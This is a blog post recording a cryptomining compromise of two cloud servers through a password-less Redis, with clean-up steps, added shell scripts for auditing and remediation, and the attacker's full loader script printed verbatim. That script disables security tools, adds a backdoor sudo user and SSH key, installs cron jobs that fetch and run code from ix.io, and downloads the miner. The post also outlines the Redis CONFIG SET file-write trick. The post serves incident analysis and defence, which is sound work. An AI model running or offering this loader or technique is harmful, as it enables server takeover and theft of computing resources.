
A record of two servers being hit by cryptomining at the same time

Note:
This article was last updated on 2019-11-18 and has gone more than 1,591 days without an update. If the images in it have broken (do not load), please leave a comment or contact me directly.

How it started

Yesterday (2019-11-17) Alibaba Cloud sent me an SMS saying something about a malicious download. I thought there was no way, Alibaba Cloud must have got it wrong, I had not downloaded anything, so I decided it was nothing and went back to writing code.

[image: Alibaba Cloud emergency SMS, 2019-11-17]

Then today another one arrived, and I found that every process on my server had died. Worst of all, my blog www.lzhpo.com was down too. Only then did I realise how serious this was.

[image: Alibaba Cloud emergency SMS, 2019-11-18]

The servers

I only have two servers, and on both of them the CPU was pegged by a process called sic.

Server 1

[image: Alibaba Cloud ECS instance hit by the miner]

Server 2

[image: lightweight server hit by the miner]

1. Locate the mining process and its file on disk, and strip the execute bit from the miner.

[root@lzhpo-ecs ~]# find / -name sic
/var/tmp/sic
/var/tmp/sic/sic
[root@lzhpo-ecs sic]# ll
total 756
-rw-r--r-- 1 root root   2995 Nov 18 18:30 config.json
-rwxr-xr-x 1 root root 766024 Nov 18 18:21 sic
[root@lzhpo-ecs sic]# chmod -x sic config.json

2. Kill the mining process, then delete the mining program (the cron jobs removed in step 4 re-download it twice an hour, so until they are gone it comes straight back).

# match the full path: a bare 'sic' also matches basic, music, classic, ...
ps -ef | grep -v grep | grep -w 'sic/sic' | awk '{print $2}' | xargs -r kill -9
rm -rf /var/tmp/sic/

3. Remove the public key under .ssh/

I never uploaded a public key to this server, so the intruder must have left it.

[root@lzhpo-ecs ~]# cd ~/.ssh
[root@lzhpo-ecs .ssh]# pwd
/root/.ssh
[root@lzhpo-ecs .ssh]# ll
total 4
-r-xr-xr-x 1 root root 743 Nov 18 18:20 authorized_keys
[root@lzhpo-ecs .ssh]# cat authorized_keys 


ssh-rsa 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 adm1n@localhost
[root@lzhpo-ecs .ssh]# rm -rf authorized_keys 
[root@lzhpo-ecs .ssh]#

4. Remove the cron jobs

[root@lzhpo-ecs ~]# crontab -l
0,30 * * * * curl -sL http://ix.io/1XQa | bash -s
0,45 * * * * curl -sL http://ix.io/1XQh | bash -s

# inside the editor, delete the two lines shown above
[root@lzhpo-ecs ~]# crontab -e

That deals with the miner itself. But the loader script reproduced below does more than install the miner: it creates a sudo-capable user darmok, appends Port 78 and PermitRootLogin yes to /etc/ssh/sshd_config, blanks /etc/hosts.allow and /etc/hosts.deny, disables SELinux, AppArmor and the firewall, and kills and deletes the Aliyun security agent (aegis). Unless those are reverted as well (userdel darmok, drop the darmok line from /etc/sudoers, remove the two sshd_config lines and restart sshd, re-enable SELinux, reinstall the agent), the attacker still has a way back in after the key and the cron entries are gone.
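Pulling the four steps together, here is an added example (my own shell, not the commands from this post) that does the clean-up in an order the cron loader cannot undo, and then checks for every artefact the loader script reproduced further down leaves behind. The checks take a root prefix so they can be run against a mounted disk image or the constructed test tree built by make_sample_tree; only live_cleanup touches the real system. The paths, the user name darmok, the key comment adm1n@localhost and port 78 are taken from the script on this page; everything else is assumed.

```shell
#!/usr/bin/env bash
# Added example, not the post author's commands: ordered clean-up of the "sic"
# miner plus a check for the persistence the loader script leaves behind
# (reconstructed from the crontab, authorized_keys and script shown in the post).
# Every check takes a root prefix so it can run against a mounted image or a
# test directory instead of the live system; "" or "/" means the live system.

# Print a crontab (file, or stdin when no file is given) without the two ix.io loader lines.
strip_cron_entries() {                 # usage: strip_cron_entries [crontab-file]
    grep -Ev 'curl -sL http://ix\.io/' "${1:--}" || true
}

# Succeeds if authorized_keys holds the injected key (its comment is adm1n@localhost).
has_attacker_key() {                   # usage: has_attacker_key <authorized_keys>
    grep -qsw 'adm1n@localhost' "$1"
}

# One line per artefact found under the prefix: the miner, the key, the darmok
# backdoor user, the sshd changes, the cron loader and the SELinux switch-off.
persistence_findings() {               # usage: persistence_findings [root-prefix]
    local r="${1:-}"
    { [ -e "$r/var/tmp/sic/sic" ] || [ -e "$r/tmp/sic/sic" ]; } && echo "miner binary still on disk"
    has_attacker_key "$r/root/.ssh/authorized_keys"      && echo "attacker key in /root/.ssh/authorized_keys"
    grep -qs '^darmok:' "$r/etc/passwd"                  && echo "backdoor user darmok exists"
    grep -qs '^darmok[[:space:]]' "$r/etc/sudoers"       && echo "darmok has a sudoers entry"
    grep -Eqs '^root:.*[:,]darmok(,|$)' "$r/etc/group"   && echo "darmok is in group root"
    grep -Eqs '^[[:space:]]*Port[[:space:]]+78[[:space:]]*$' "$r/etc/ssh/sshd_config" && echo "sshd has an extra Port 78"
    grep -Eqis '^[[:space:]]*PermitRootLogin[[:space:]]+yes' "$r/etc/ssh/sshd_config" && echo "PermitRootLogin yes"
    grep -qs 'ix\.io' "$r/var/spool/cron/root"           && echo "root crontab still pulls from ix.io"
    grep -qs '^SELINUX=disabled' "$r/etc/selinux/config" && echo "SELinux disabled in /etc/selinux/config"
    return 0
}

# Live remediation, as root, ordered so the cron loader cannot re-install the
# miner while it is being removed. Nothing else in this file calls it.
live_cleanup() {
    # 1. persistence first: the two cron lines re-run the loader twice an hour
    crontab -l 2>/dev/null | strip_cron_entries | crontab -
    # 2. kill by full path; a bare "grep sic" also matches basic, music, classic, ...
    pkill -KILL -f '^(/var)?/tmp/sic/sic' 2>/dev/null || true
    # 3. dropper directories and the injected key
    rm -rf /var/tmp/sic /tmp/sic
    sed -i '/adm1n@localhost/d' /root/.ssh/authorized_keys 2>/dev/null || true
    # 4. the backdoor user and the sshd changes made by sshaddusergo()/sshkeysgo()
    id darmok >/dev/null 2>&1 && userdel -r darmok
    sed -i '/^darmok[[:space:]]/d' /etc/sudoers
    sed -i -E '/^[[:space:]]*Port[[:space:]]+78[[:space:]]*$/d; /^[[:space:]]*PermitRootLogin[[:space:]]+yes/d' /etc/ssh/sshd_config
    systemctl restart sshd 2>/dev/null || service sshd restart
    # 5. SELinux, AppArmor, ufw/iptables and the Aliyun aegis agent were switched off
    #    or deleted by securitygo(); restore those by hand, then re-check:
    persistence_findings /
}

# Constructed sample tree mimicking what the loader leaves behind, so the checks
# can be exercised offline (nothing here touches the live system).
make_sample_tree() {                   # prints the path of the new tree
    local t
    t="$(mktemp -d)"
    mkdir -p "$t/var/tmp/sic" "$t/root/.ssh" "$t/etc/ssh" "$t/etc/selinux" "$t/var/spool/cron"
    : >"$t/var/tmp/sic/sic"
    printf '\n\nssh-rsa AAAA...redacted... adm1n@localhost\n' >"$t/root/.ssh/authorized_keys"
    printf 'root:x:0:0:root:/root:/bin/bash\ndarmok:x:1001:1001::/home/darmok:/bin/sh\n' >"$t/etc/passwd"
    printf 'root ALL=(ALL) ALL\ndarmok    ALL=(ALL)       ALL\n' >"$t/etc/sudoers"
    printf 'root:x:0:darmok\n' >"$t/etc/group"
    printf 'Port 22\nPermitRootLogin yes\nPort 78\n' >"$t/etc/ssh/sshd_config"
    printf '0,30 * * * * curl -sL http://ix.io/1XQa | bash -s\n0,45 * * * * curl -sL http://ix.io/1XQh | bash -s\n' >"$t/var/spool/cron/root"
    printf 'SELINUX=disabled\n' >"$t/etc/selinux/config"
    echo "$t"
}
```

Run persistence_findings with no argument on the live box after the clean-up; an empty result means nothing the script plants is left. The order in live_cleanup matters: if the cron lines are still installed when the process is killed, the loader simply downloads and restarts the miner on the next half hour.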

These miners all got in through Redis instances that had no password set. An unauthenticated Redis reachable from the internet hands an attacker the whole command set, and the usual trick is to point its dump file at a sensitive path with CONFIG SET dir and CONFIG SET dbfilename and then SAVE, which is enough to write an authorized_keys or a cron file like the ones found above. So: do you still dare to run Redis without a password?
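As an added example (my own, not part of the original post), here is a shell audit of a redis.conf for the settings that turn an exposed, password-less Redis into the file-write primitive described above, run against a constructed weak config like the one that let the miner in and against a hardened one. The config texts, the placeholder password and the finding wording are assumptions for illustration.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: audit a redis.conf for the settings
# that make an internet-facing Redis without a password a file-write primitive
# (CONFIG SET dir / CONFIG SET dbfilename followed by SAVE can drop a file such
# as authorized_keys or a crontab). The sample configs below are constructed.

# Succeeds if the (comment-stripped) config text in $2 has a line matching ERE $1.
conf_has() {                            # usage: conf_has <ere> <config-text>
    printf '%s\n' "$2" | grep -Eq "$1"
}

# Print one finding per line for a redis.conf file; prints nothing if it looks sane.
audit_redis_conf() {                    # usage: audit_redis_conf <redis.conf>
    local cfg
    # drop comments and blank lines so a commented-out default is not counted as set
    cfg="$(grep -Ev '^[[:space:]]*(#|$)' "$1" || true)"
    conf_has '^[[:space:]]*requirepass[[:space:]]+[^[:space:]]+' "$cfg" \
        || echo "no requirepass: anyone who can reach the port has full control"
    if ! conf_has '^[[:space:]]*bind[[:space:]]' "$cfg"; then
        echo "no bind directive: Redis listens on every interface"
    elif conf_has '^[[:space:]]*bind[[:space:]]+.*0\.0\.0\.0' "$cfg"; then
        echo "bind 0.0.0.0: Redis listens on every interface"
    fi
    conf_has '^[[:space:]]*protected-mode[[:space:]]+no' "$cfg" \
        && echo "protected-mode no: unauthenticated remote clients are accepted"
    conf_has '^[[:space:]]*rename-command[[:space:]]+CONFIG[[:space:]]' "$cfg" \
        || echo "CONFIG not renamed: CONFIG SET dir/dbfilename is reachable"
    return 0
}

# Number of findings for a config given as text.
count_findings() {                      # usage: count_findings "<config text>"
    local tmp
    tmp="$(mktemp)"
    printf '%s' "$1" >"$tmp"
    audit_redis_conf "$tmp" | wc -l | tr -d ' '
    rm -f "$tmp"
}

# Constructed samples: a config like the one that let the miner in, and a hardened one.
WEAK_CONF='bind 0.0.0.0
protected-mode no
port 6379
# requirepass foobared
'
HARDENED_CONF='bind 127.0.0.1
protected-mode yes
port 6379
requirepass replace-with-a-long-random-secret
rename-command CONFIG ""
rename-command FLUSHALL ""
'

# From any other host, an unauthenticated PONG is exactly the exposure in this post:
#   redis-cli -h <server-ip> ping
# Besides the config, make sure the cloud security group does not open 6379 at all.
```

The weak config produces four findings and the hardened one none. Binding to 127.0.0.1 (or a private interface) and closing 6379 in the security group remove the remote reachability; requirepass and renaming CONFIG remove the file-write primitive even if the port is reachable, which is what matters when an application on another host genuinely needs the database.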

Now let's look at the files behind those cron job URLs

They are shell scripts that make your server do all kinds of "fancy" things. Reading the one behind 1XQa (reproduced below), its functions run in this order and do far more than mine:

securitygo(): turns off SELinux, ufw, iptables and AppArmor, kills the Aliyun aegis agent and deletes /usr/local/aegis, pulls and runs the second script (1XQh), then kills every process above 80% CPU that is not its own miner, which is very likely why my other services died.
sshaddusergo(): creates a user darmok with a preset password hash, adds it to sudoers and sets PermitRootLogin yes.
sshkeysgo(): injects the adm1n@localhost key into /root/.ssh/authorized_keys, blanks /etc/hosts.allow and /etc/hosts.deny and appends Port 78 to sshd_config so SSH also answers on a second port.
filesetupgo()/filegetgo(): beacons to iplogger.org, then downloads config.json and the sic binary from a chain of fallback URL lists on ix.io (config.json is disguised as .jpg files on image-hosting sites), verifies them by MD5, enables huge pages and starts the miner.
cronsetupgo(): re-installs the two cron entries if they are missing.
filerungo()/resetsshgo(): restart the miner if it is not running, and restart sshd so the changes take effect.

[image: the cron job script]

#!/bin/bash

resetsshgo(){
if [ "$needreset" -eq "0" ]; 
then
echo "no need"
else
sleep 10;
/etc/init.d/ssh restart;
/etc/init.d/sshd restart;
/etc/rc.d/sshd restart;
service ssh restart;
service sshd restart;
systemctl start ssh;
systemctl restart ssh;
scw-fetch-ssh-keys --upgrade;
fi
}

sshaddusergo() {
if id "darmok" 2>/dev/null; then
echo ""
else
useradd -m -p '$1$EuTlnGKV$I6ULVhrfUCnEpFqLGFVHY0' darmok;
usermod -aG sudoers darmok;
usermod -aG root darmok;
adduser darmok sudo;
echo "darmok    ALL=(ALL)       ALL" >> /etc/sudoers
sed -i '/.PermitRootLogin*/d' /etc/ssh/sshd_config
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
needreset=1;
fi
}

filegetgo(){
sysctl -w vm.nr_hugepages=$(nproc --all);
echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled;
curl -sL -o /var/tmp/sic/config.json http://ix.io/1XQf || curl -sL -o /tmp/sic/config.json http://ix.io/1XQf;
if md5sum --status -c - <<<"79842ff6ab72f12c836b1f83021c801b /var/tmp/sic/config.json" || md5sum --status -c - <<<"79842ff6ab72f12c836b1f83021c801b /tmp/sic/config.json"
then
echo ""
else
curl -sL -o /var/tmp/sic/config.json http://photo20.ir/images/up13131574026902_k.jpg || curl -sL -o /tmp/sic/config.json http://photo20.ir/images/up13131574026902_k.jpg;
if md5sum --status -c - <<<"79842ff6ab72f12c836b1f83021c801b /var/tmp/sic/config.json" || md5sum --status -c - <<<"79842ff6ab72f12c836b1f83021c801b /tmp/sic/config.json"
then
echo ""
else
curl -sL -o /var/tmp/sic/config.json http://uupload.ir/files/wavo_img.jpg  || curl -sL -o /tmp/sic/config.json http://uupload.ir/files/wavo_img.jpg;
fi
fi
url[0]="$(curl -sL $(curl -sL http://ix.io/212B | shuf | head -1) | grep -i "><img" | sed -r 's/.*href="([^"]+).*/\1/g' | head -1)" && curl --create-dirs -sL -o /var/tmp/sic/sic ${url[0]} || curl ---create-dirs sL -o /tmp/sic/sic ${url[0]};
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
url[1]="$(curl -sL $(curl -sL http://ix.io/212F | shuf | head -1) | grep -i "><img" | sed -r 's/.*href="([^"]+).*/\1/g' | head -1)" && curl --create-dirs -sL -o /var/tmp/sic/sic ${url[1]} || curl --create-dirs -sL -o /tmp/sic/sic ${url[1]};
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
url[2]="$(curl -sL $(curl -sL http://ix.io/212G | shuf | head -1) | grep -i "><img" | sed -r 's/.*href="([^"]+).*/\1/g' | head -1)" && curl --create-dirs -sL -o /var/tmp/sic/sic ${url[2]} || curl ---create-dirs sL -o /tmp/sic/sic ${url[2]};
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
url[3]="$(curl -sL $(curl -sL http://ix.io/2160 | shuf | head -1) | grep -i "><img" | sed -r 's/.*href="([^"]+).*/\1/g' | head -1)" && curl --create-dirs -sL -o /var/tmp/sic/sic ${url[3]} || curl --create-dirs -sL -o /tmp/sic/sic ${url[3]};
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
url[4]="$(curl -sL $(curl -sL http://ix.io/21cd | shuf | head -1) | grep  -i "><img" | sed -r 's/.*href="([^"]+).*/\1/g' | head -1)" && curl --create-dirs -sL -o /var/tmp/sic/sic ${url[4]} || curl --create-dirs -sL -o /tmp/sic/sic ${url[4]};
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
url[5]="$(curl -sL $(curl -sL hhttp://ix.io/21ce | shuf | head -1) | grep  -i "><img" | sed -r 's/.*href="([^"]+).*/\1/g' | head -1)" && curl --create-dirs -sL -o /var/tmp/sic/sic ${url[5]} || curl --create-dirs -sL -o /tmp/sic/sic ${url[5]};
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
url[6]="$(curl -sL $(curl -sL http://ix.io/21cf | shuf | head -1) | grep  -i "><img" | sed -r 's/.*href="([^"]+).*/\1/g' | head -1)" && curl --create-dirs -sL -o /var/tmp/sic/sic ${url[6]} || curl --create-dirs -sL -o /tmp/sic/sic ${url[6]};
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
url[7]="$(curl -sL $(curl -sLk http://ix.io/21cg | shuf | head -1) | grep  -i "><img" | sed -r 's/.*href="([^"]+).*/\1/g' | head -1)" && curl --create-dirs -sL -o /var/tmp/sic/sic ${url[7]} || curl --create-dirs -sL -o /tmp/sic/sic ${url[7]};
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
url[8]="$(curl -sL $(curl -sLk http://ix.io/21Ds | shuf | head -1) | grep  -i "><img" | sed -r 's/.*href="([^"]+).*/\1/g' | head -1)" && curl --create-dirs -sL -o /var/tmp/sic/sic ${url[8]} || curl --create-dirs -sL -o /tmp/sic/sic ${url[8]};
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
apt-get install -y wget || yum install -y wget;
wget $(curl http://ix.io/1XQn) -O /var/tmp/sic/sic || wget $(curl http://ix.io/1XQn) -O /tmp/sic/sic;
if md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /var/tmp/sic/sic" || md5sum --status -c - <<<"72e3f8762f4d35fde98afcaf684eaa86 /tmp/sic/sic"
then
chmod +x /var/tmp/sic/sic || /tmp/sic/sic
/var/tmp/sic/sic || /tmp/sic/sic
else
echo "well shit"
fi
fi
fi
fi
fi
fi
fi
fi
fi
fi
}

sshkeysgo(){
if [ -f "/root/.ssh/authorized_keys" ]
then
echo ""
else
needreset=1;
mkdir -p /root/.ssh
echo "" >> /root/.ssh/authorized_keys
fi
cat /etc/ssh/sshd_config | grep -iw "#Port 22" | grep -v grep >/dev/null
if [ $? -eq 1 ]
then
echo ""
else
needreset=1;
sed -i 's/#Port 22/Port 22/g' /etc/ssh/sshd_config
fi
cat /etc/ssh/sshd_config | grep -iw "port 78" | grep -v grep >/dev/null
if [ $? -eq 0 ]
then
echo ""
else
needreset=1;
echo "" > /etc/hosts.deny;
echo "" > /etc/hosts.allow;
chattr -iau /etc/ssh/sshd_config
chmod 777 /etc/ssh/sshd_config
echo "Port 78" >> /etc/ssh/sshd_config;
chmod 555 /etc/ssh/sshd_config
fi
cat /root/.ssh/authorized_keys | grep -iw "adm1n@localhost" | grep -v grep >/dev/null
if [ $? -eq 0 ]
then
echo ""
else
needreset=1;
mkdir -p /root/.ssh
chmod 777 /root/.ssh/authorized_keys;
chattr -iau /root/.ssh/authorized_keys;
echo -e "\n" >> /root/.ssh/authorized_keys
echo "ssh-rsa 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 adm1n@localhost" >> /root/.ssh/authorized_keys
sed -i '/.PermitRootLogin*/d' /etc/ssh/sshd_config
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
chmod 555 /root/.ssh/authorized_keys
fi
}

securitygo() {
needreset=0;
setenforce 0;
ufw disable;
iptables -F;
echo SELINUX=disabled > /etc/selinux/config;
systemctl stop apparmor;
systemctl disable apparmor;
service apparmor stop;
service apparmor teardown;
update-rc.d -f apparmor remove;
ps aux | grep -v grep | grep 'aegis' | awk '{prrint $2}' | xargs -I % kill -9 %;
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %;
rm -rf /usr/local/aegis;
curl -sL http://ix.io/1XQh | bash -s 2>/dev/null;
ps aux | grep -vw sic/sic | grep -v grep | awk '{if($3>80.0) print $2}' | xargs -I % kill -9 %
}

filesetupgo(){
j=0; for i in `ps -fe| grep 'sic/sic' | grep -v grep | grep -v http | awk '{print $2}'`; do let j=j+1; if [ $j -ge 2 ]; then echo "Killing process $i"; kill -9 $i; fi done;
ps -fe | grep -w sic/sic | grep -v grep | grep -v http
if [ $? -eq 0 ]
then
echo "RUNNING";
else
curl -4sL "https://iplogger.org/1uUs87" 2>/dev/null;
mkdir -p /var/tmp/sic || mkdir -p /tmp/sic/;
filegetgo
fi
}

cronsetupgo(){
crontab -l |grep -e "1XQa" | grep -v grep
if [ $? -eq 0 ]
then
echo "cron good"
else
chattr -aui /var/spool/cron/root
echo "0,30 * * * * curl -sL http://ix.io/1XQa | bash -s" >> /tmp/cron || true && \
echo "0,45 * * * * curl -sL http://ix.io/1XQh | bash -s" >> /tmp/cron || true && \
crontab -u root /tmp/cron || true && \
anacron -t /tmp/cron
rm -rf /tmp/cron
fi
}


filerungo(){
ps -fe | grep -w sic/sic | grep -v grep | grep -v http
if [ $? -eq 0 ]
then
echo "RUNNING"
else
sysctl -w vm.nr_hugepages=$(nproc --all)
echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled
/var/tmp/sic/sic || /tmp/sic/sic
fi
ps aux | grep -vw sic/sic | grep -v grep | awk '{if($3>80.0) print $2}' | xargs -I % kill -9 %
}

securitygo
sshaddusergo
sshkeysgo
filesetupgo
cronsetupgo
filerungo
resetsshgo

Understanding mining

In the Bitcoin system a new block is generated roughly every ten minutes, and that block records all Bitcoin transactions across the network in those ten minutes. What we call mining is the process of recording those transactions.

Because the system is decentralised, everyone has the right to record transactions for others, and whoever wins the right to record a block is rewarded with newly created bitcoins, so mining is also how bitcoins are produced. Bitcoin was invented by Satoshi Nakamoto.

To get bitcoins you need a lot of high-performance mining rigs, so my servers, whose Redis had no password, "won the lottery"! (Miners dropped on Linux servers normally target coins that are still profitably mined on ordinary CPUs rather than Bitcoin, which has needed dedicated ASIC hardware for years; the huge-page tuning in the script above is a typical CPU-miner optimisation. The principle is the same either way: someone else's electricity and CPU time pay for the attacker's coins.)

Reference articles on the mining concept

https://www.zhihu.com/question/20792042

https://www.zhihu.com/question/21343860

https://www.walian.cn/zixun/news/1468.html

https://www.weusecoins.com/translations/mining-guide/zh-mining-guide/
